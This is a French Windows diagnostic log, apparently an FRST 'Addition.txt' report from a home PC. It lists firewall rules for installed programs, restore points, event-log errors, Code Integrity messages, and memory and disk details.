[{17E30375-6665-409D-810C-980E1161B3F1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe FirewallRules: [{A960E6AE-8697-4714-B498-7AE160D75736}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe FirewallRules: [{2A02DE85-DDA2-48FE-8B29-2303C6A87D21}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{74C6A465-71EC-4395-818A-65D2F0B3D213}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe FirewallRules: [{35F923A9-4CB2-42F1-AC72-CBABA3CAB011}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe FirewallRules: [{B39C3799-4EEB-4218-A69F-7752A4A84BBD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe FirewallRules: [{C0922FC7-A070-49E2-8C76-F9EC17E38795}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{62259E5A-F742-48D4-8063-7F9D2D0F3B99}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe FirewallRules: [{BDA397FE-EFBC-4ED3-B936-072B84D8964F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{D26D79E1-8E4E-4720-BD02-AFF04CE526FA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{1BAA7AF7-BC49-4C97-BF09-0996C3BABA3D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe FirewallRules: [{DB29FE87-FEBF-488B-9A77-D3B452A3BB49}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe FirewallRules: [{73918001-4F16-447C-A999-2D55EA29B2C5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{11C9CF05-C7D7-43A6-AF62-9CD87CAB61DC}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [UDP Query User{B8129375-3C84-4EA9-B2E7-5E99A182B9AB}C:\program files (x86)\city car driving\bin\win32\starter.exe] => (Allow) C:\program files (x86)\city car driving\bin\win32\starter.exe FirewallRules: [TCP Query User{A35238EA-FA5C-4FC8-9A73-40812AA5899D}C:\program files (x86)\city car driving\bin\win32\starter.exe] => (Allow) C:\program files (x86)\city car driving\bin\win32\starter.exe FirewallRules: [UDP Query User{8FB6754A-4160-4716-9FEA-85D24922B4FC}C:\program files (x86)\youwave_android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave_android\vb\vboxsdl.exe FirewallRules: [TCP Query User{CA247479-49A0-4759-88F3-5568B7DFFC29}C:\program files (x86)\youwave_android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave_android\vb\vboxsdl.exe FirewallRules: [{4F66376F-0B3E-4E93-A831-C340FB458058}] => (Allow) C:\Program Files (x86)\Farming Simulator 2013\x86\FarmingSimulator2013Game.exe FirewallRules: [{6CF2714C-CBDB-403F-B8B4-D152F57522B8}] => (Allow) C:\Program Files (x86)\Farming Simulator 2013\x86\FarmingSimulator2013Game.exe FirewallRules: [{89EBD227-BBAB-4639-B255-9E8F65599EBB}] => (Allow) C:\Program Files (x86)\Farming Simulator 2013\x64\FarmingSimulator2013Game.exe FirewallRules: [{3591D5BD-D9E5-4933-B37F-B88924EB6421}] => (Allow) C:\Program Files (x86)\Farming Simulator 2013\x64\FarmingSimulator2013Game.exe FirewallRules: [{E12A77DE-BEF9-4E0D-9AE8-E08B3D161CB8}] => (Allow) C:\Program Files (x86)\Farming Simulator 2013\FarmingSimulator2013.exe FirewallRules: [{0276A07F-F485-41D4-B5A5-05CFED47D953}] => (Allow) C:\Program Files (x86)\Farming Simulator 2013\FarmingSimulator2013.exe FirewallRules: [{568F9EA6-844C-4D32-A67D-8E64D0D1EE61}] => (Allow) E:\fscommand\CKSocketServer.exe FirewallRules: [{080B213F-BC49-4FBB-951F-1217842811B9}] => (Allow) E:\fscommand\CKSocketServer.exe FirewallRules: [{2A4C3C00-A7C1-4D9A-A2BD-1783FD05D751}] => (Allow) C:\Program Files\ma-config.com\MaConfigAgent.exe FirewallRules: [{F845F028-075C-4750-ABC0-E816D3C3FE24}] => (Allow) C:\Program Files\ma-config.com\MaConfigAgent.exe FirewallRules: [{A0078B2D-F652-4656-8D7E-3D03B01ADA62}] => (Allow) LPort=48114 FirewallRules: [{388E33E8-08B1-4412-9C64-C45C9019A554}] => (Allow) LPort=48113 FirewallRules: [UDP Query User{AA5E1961-1299-4964-99DA-DDB4E517D06D}C:\users\famille\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\utorrent.exe FirewallRules: [TCP Query User{D17BDCEE-EB09-46AF-837B-D58065F9B2F5}C:\users\famille\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\utorrent.exe FirewallRules: [{96435531-1F62-4472-B183-F3B7A8AD2213}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE FirewallRules: [{7F3ADF46-90D1-4BA8-9524-97BF79C94C22}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe FirewallRules: [{160B4C03-B809-4EB0-93CB-830E5EC35565}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe FirewallRules: [{9A07BBBC-69F3-47E0-8628-29D5920D162D}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer.exe FirewallRules: [{EB02DB01-DE6F-4F5A-8FE8-873AEC7EC915}] => (Allow) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer.exe FirewallRules: [{C5FE0FFF-476E-4E95-9E2C-86E5F97FCD3D}] => (Allow) %LocalAppData%\HPConnectedMusic\Application\spotify_helper.exe FirewallRules: [{A77CBFDC-34D2-4DF3-910E-1559F3033861}] => (Allow) %LocalAppData%\HPConnectedMusic\Application\spotify_helper.exe FirewallRules: [{153A2EBE-2887-4DF0-AA50-394F18220D6C}] => (Allow) %LocalAppData%\HPConnectedMusic\Application\HPConnectedMusic.exe FirewallRules: [{4D8711FD-B37B-4EDA-96A6-3F11E05E1691}] => (Allow) %LocalAppData%\HPConnectedMusic\Application\HPConnectedMusic.exe FirewallRules: [{72293D48-A00E-4E2E-B3FA-C501AA4FBA78}] => (Allow) C:\Program Files (x86)\HPConnectedMusic\HPConnectedMusic.exe FirewallRules: [{7F9AE464-81AE-4EB4-A5DB-916FE849ABEF}] => (Allow) C:\Program Files (x86)\HPConnectedMusic\HPConnectedMusic.exe FirewallRules: [{B961BFF7-4054-498C-9E9B-7044F967E0DB}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe FirewallRules: [{B02D9C82-6C1B-4385-8191-F9F0401963EB}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe FirewallRules: [TCP Query User{693AF1C8-3C36-4DBE-B15C-C3D069252CD5}C:\program files (x86)\farming simulator 15\x64\farmingsimulator2015game.exe] => (Block) C:\program files (x86)\farming simulator 15\x64\farmingsimulator2015game.exe FirewallRules: [UDP Query User{D7878E2B-F793-4BA8-8B42-4708EBEA62DA}C:\program files (x86)\farming simulator 15\x64\farmingsimulator2015game.exe] => (Block) C:\program files (x86)\farming simulator 15\x64\farmingsimulator2015game.exe FirewallRules: [TCP Query User{1FAB8854-C4A9-4C79-AACC-14E75751A7DF}C:\program files (x86)\orange\assistance livebox\dist\st2.exe] => (Allow) C:\program files (x86)\orange\assistance livebox\dist\st2.exe FirewallRules: [UDP Query User{3E315012-070C-4761-A78A-DE0E605F5E85}C:\program files (x86)\orange\assistance livebox\dist\st2.exe] => (Allow) C:\program files (x86)\orange\assistance livebox\dist\st2.exe FirewallRules: [TCP Query User{03279B3A-A19D-4F7F-9B4A-B7F4FCE7B98C}C:\program files (x86)\farming simulator 2013\x86\farmingsimulator2013game.exe] => (Block) C:\program files (x86)\farming simulator 2013\x86\farmingsimulator2013game.exe FirewallRules: [UDP Query User{9452B7CE-7E6B-4E30-8A17-114191517206}C:\program files (x86)\farming simulator 2013\x86\farmingsimulator2013game.exe] => (Block) C:\program files (x86)\farming simulator 2013\x86\farmingsimulator2013game.exe FirewallRules: [TCP Query User{56C0ADE8-D0D8-4B64-97E8-81C2369DA8C0}C:\program files (x86)\city car driving\bin\win32\starter.exe] => (Block) C:\program files (x86)\city car driving\bin\win32\starter.exe FirewallRules: [UDP Query User{D91F4A6D-0DBA-4E76-BFE7-14DCA5A28B08}C:\program files (x86)\city car driving\bin\win32\starter.exe] => (Block) C:\program files (x86)\city car driving\bin\win32\starter.exe FirewallRules: [{973EA6E7-2600-4DED-A414-DCB7FEB56BF1}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe FirewallRules: [{7170CF78-9833-43B1-8588-29E4A264829C}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe FirewallRules: [{5731DB8E-92FA-4F76-93B9-4D50209675BC}] => (Allow) C:\Users\Famille\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{510A05A1-1FDC-4989-AB06-4558D491C80E}] => (Allow) C:\Users\Famille\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{45022EE9-8BC0-4DF6-92F3-FECA44C3AB98}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{3DD2F00D-ADD3-4101-8299-12E3554FF3F6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{E5985235-13A5-45BC-A01F-4A58DE2D368F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{8F9C1DDB-A016-4945-BD5E-17E73CA680AA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{AF42FC57-B187-48DC-9C7E-C4DF1233D39D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Farming Simulator 15\x64\FarmingSimulator2015Game.exe FirewallRules: [{1802D1A3-0286-4480-BE84-3F296336E1FA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Farming Simulator 15\x64\FarmingSimulator2015Game.exe FirewallRules: [{9C9D403D-0514-4A98-B74D-9D2E12752B9D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Farming Simulator 15\x86\FarmingSimulator2015Game.exe FirewallRules: [{66B70955-7235-4D38-BE62-82990B83F487}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Farming Simulator 15\x86\FarmingSimulator2015Game.exe FirewallRules: [TCP Query User{C745F11F-93FC-4556-95BA-D3CED2C11428}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41372.exe FirewallRules: [UDP Query User{2146CC7E-59B3-40E8-92D8-59A6210DE494}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41372.exe FirewallRules: [{75CF7D34-660B-4FC8-B4A6-26252C47A4E8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Farming Simulator 15\x64\FarmingSimulator2015Game.exe FirewallRules: [{2E264853-9300-4E93-B511-B9C8B16399B1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Farming Simulator 15\x64\FarmingSimulator2015Game.exe FirewallRules: [{F6C2B232-6543-4A54-A2B2-FE9A6D8FFBEC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [TCP Query User{7D9157F1-D4A3-4DEB-BCE6-2FCD8EDC58B6}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41712.exe FirewallRules: [UDP Query User{BC805B56-A864-42C3-B1BC-A98D814324DD}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41712.exe FirewallRules: [TCP Query User{5AFD86A2-ECCC-40A6-9AAB-0AB8B067CB2D}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41712.exe FirewallRules: [UDP Query User{4F9E733F-CEF5-40F3-B362-65F12D0B828B}C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Block) C:\users\famille\appdata\roaming\utorrent\updates\3.4.5_41712.exe FirewallRules: [{AC4E87C5-EE20-44F7-A435-9164D656E61F}] => (Allow) C:\Program Files (x86)\Orange\Orange Installer\OrangeInstaller.exe FirewallRules: [{19F3BED8-0FC8-46F3-B49F-5A9D6C27B4B3}] => (Allow) C:\Program Files (x86)\Orange\Orange Installer\OrangeInstaller.exe FirewallRules: [{E39AC5BC-72DC-4BD0-81FF-8724CE6F73CC}] => (Allow) C:\Program Files (x86)\Orange\Orange Installer\OrangeInstaller.exe FirewallRules: [{A04839B3-DC12-483D-A4D4-85A1DC779F8B}] => (Allow) C:\Program Files (x86)\Orange\Orange Installer\OrangeInstaller.exe ==================== Points de restauration ========================= 20-01-2016 18:40:01 avast! antivirus system restore point 23-01-2016 13:55:13 avast! antivirus system restore point 26-01-2016 21:00:02 avast! antivirus system restore point 04-02-2016 02:47:32 Point de contrôle planifié 06-02-2016 11:50:06 avast! antivirus system restore point 07-02-2016 21:18:37 avast! antivirus system restore point 08-02-2016 21:57:47 avast! antivirus system restore point ==================== Éléments en erreur du Gestionnaire de périphériques ============= ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (02/09/2016 12:02:54 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: La création du contexte d’activation a échoué pour « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest1 ». Erreur dans le fichier de manifeste ou de stratégie « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest2 » à la ligne C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest3. Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest. Composant 2 : C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528.manifest. Error: (02/09/2016 12:02:54 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: La création du contexte d’activation a échoué pour « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest1 ». Erreur dans le fichier de manifeste ou de stratégie « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest2 » à la ligne C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest3. Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest. Composant 2 : C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528.manifest. Error: (02/09/2016 12:02:53 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: La création du contexte d’activation a échoué pour « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest1 ». Erreur dans le fichier de manifeste ou de stratégie « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest2 » à la ligne C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest3. Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest. Composant 2 : C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528.manifest. Error: (02/09/2016 12:02:53 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: La création du contexte d’activation a échoué pour « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest1 ». Erreur dans le fichier de manifeste ou de stratégie « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest2 » à la ligne C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest3. Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest. Composant 2 : C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528.manifest. Error: (02/09/2016 12:02:53 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: La création du contexte d’activation a échoué pour « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest1 ». Erreur dans le fichier de manifeste ou de stratégie « C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest2 » à la ligne C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest3. Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest. Composant 2 : C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528.manifest. Error: (02/09/2016 11:52:00 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante winlogon.exe, version : 10.0.10586.63, horodatage : 0x568b1fc9 Nom du module défaillant : ntdll.dll, version : 10.0.10586.20, horodatage : 0x56540c3b Code d’exception : 0xc0000008 Décalage d’erreur : 0x00000000000a897a ID du processus défaillant : 0x2a4 Heure de début de l’application défaillante : 0xwinlogon.exe0 Chemin d’accès de l’application défaillante : winlogon.exe1 Chemin d’accès du module défaillant: winlogon.exe2 ID de rapport : winlogon.exe3 Nom complet du package défaillant : winlogon.exe4 ID de l’application relative au package défaillant : winlogon.exe5 Error: (02/09/2016 11:46:06 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LeFLOCH) Description: Échec de l’activation de l’application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI avec l’erreur : -2144927141 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Error: (02/09/2016 10:24:09 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LeFLOCH) Description: Échec de l’activation de l’application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI avec l’erreur : -2144927141 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Error: (02/09/2016 10:22:07 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LeFLOCH) Description: Échec de l’activation de l’application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI avec l’erreur : -2147024865 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Error: (02/09/2016 10:22:06 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LeFLOCH) Description: Échec de l’activation de l’application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI avec l’erreur : -2147024865 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel. Erreurs système: ============= Error: (02/09/2016 01:33:30 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: propres à l’applicationLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORITE NTSystèmeS-1-5-18LocalHost (avec LRPC)Non disponibleNon disponible Error: (02/09/2016 12:35:40 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: propres à l’applicationLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORITE NTSystèmeS-1-5-18LocalHost (avec LRPC)Non disponibleNon disponible Error: (02/09/2016 12:30:30 PM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT) Description: {784E29F4-5EBE-4279-9948-1E8FE941646D} Error: (02/09/2016 12:26:28 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: par défaut de l’ordinateurLocalActivation{4D4D0357-0376-4656-A040-65AC089E84A2}Non disponibleAUTORITE NTSERVICE LOCALS-1-5-19LocalHost (avec LRPC)Non disponibleNon disponible Error: (02/09/2016 12:26:28 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Le service Hôte de synchronisation_324bc s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service. Error: (02/09/2016 12:26:28 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: propres à l’applicationLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORITE NTSystèmeS-1-5-18LocalHost (avec LRPC)Non disponibleNon disponible Error: (02/09/2016 12:25:58 PM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Le Gestionnaire de services de contrôle a essayé d’entreprendre une action corrective (Redémarrer le service) après la fin inattendue du service Windows Search, mais cette action a échoué en raison de l’erreur suivante : %%1056 Error: (02/09/2016 12:25:32 PM) (Source: Service Control Manager) (EventID: 7006) (User: ) Description: L’appel ScRegSetValueExW a échoué pour DeleteFlag avec l’erreur : %%5 Error: (02/09/2016 12:25:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service brsrv s’est terminé de façon inattendue pour la 1ème fois. Error: (02/09/2016 12:25:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service HP Software Framework Service s’est terminé de façon inattendue pour la 1ème fois. CodeIntegrity: =================================== Date: 2016-02-08 08:58:17.750 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-02-06 11:59:03.004 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-02-06 11:51:50.655 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 14:11:05.865 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-01-24 10:50:06.875 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-01-20 22:43:14.744 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-01-17 20:24:02.715 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-01-14 14:53:54.511 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-01-14 14:38:52.542 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-11 17:27:39.944 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Infos Mémoire =========================== Processeur: AMD E1-1500 APU with Radeon(tm) HD Graphics Pourcentage de mémoire utilisée: 28% Mémoire physique - RAM - totale: 5707.64 MB Mémoire physique - RAM - disponible: 4103.5 MB Mémoire virtuelle totale: 6667.64 MB Mémoire virtuelle disponible: 4829.46 MB ==================== Lecteurs ================================ Drive c: (Windows) (Fixed) (Total:914.8 GB) (Free:671.01 GB) NTFS ==>[système avec composants d'amorçage (obtenu depuis lecteur)] Drive d: (Recovery Image) (Fixed) (Total:14.8 GB) (Free:1.81 GB) NTFS ==>[système avec composants d'amorçage (obtenu depuis lecteur)] ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: EAAADAB7) Partition: GPT. ==================== Fin de Addition.txt ============================